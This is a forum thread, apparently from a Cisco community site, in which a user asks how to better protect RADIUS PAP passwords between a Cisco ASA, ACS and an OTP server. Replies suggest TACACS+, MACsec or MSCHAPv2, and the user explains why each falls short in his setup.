09-02-2013 07:11 AM
Hi,
I use this architecture:
Client --- ASA 9.1 --- ACS 5.4 (RADIUS) --- OTP Server (RADIUS)
With PAP protocol, password is only secured by RADIUS (hash and xor with shared secret)
How could I get a stronger encryption?
Thanks for your help,
Patrick
09-02-2013 10:19 AM
Switch to TACACS+ with a strong encryption key.
If you're really interested security without changing the use of RADIUS protocol, you could secure the packets in transit with MACsec (assuming the intervening network supports it)
09-03-2013 12:10 AM
Thanks for your answer, Marvin.
Unfortunately, OTP Server dont support TACACS so this solution would solve half of the problem.
MACSec is complicated to configure in our environment... (hundreds of switch and routers...)
09-03-2013 05:58 AM
Patrick,
AFAIU password-managment will allow you to use mschapv2. I have not been checking this for a while, but I found some articles e.g.
http://www.islandearth.com/articles/2013/5/2/mschap-v2-for-cisco-asa-vpn-connections-using-radius-on-wind.html
that seem to confirm this.
This will take care of the path ASA->ACS . Now to be honest I'm not sure what will happen when you need to "proxy" the auth to another server.
M.
09-03-2013 08:41 AM
Hi Marcin,
Thanks for your advice.
I already tried to enable mschapv2.
Unfortunately, ACS dont support mschapv2 with other RADIUS Server
http://www.cisco.com/en/US/docs/net_mgmt/cisco_secure_access_control_system/5.2/user/guide/eap_pap_phase.html#wp1014889
Discover and save your favorite ideas. Come back to expert answers, step-by-step guides, recent topics, and more.
New here? Get started with these tips. How to use Community New member guide
Log in to Community
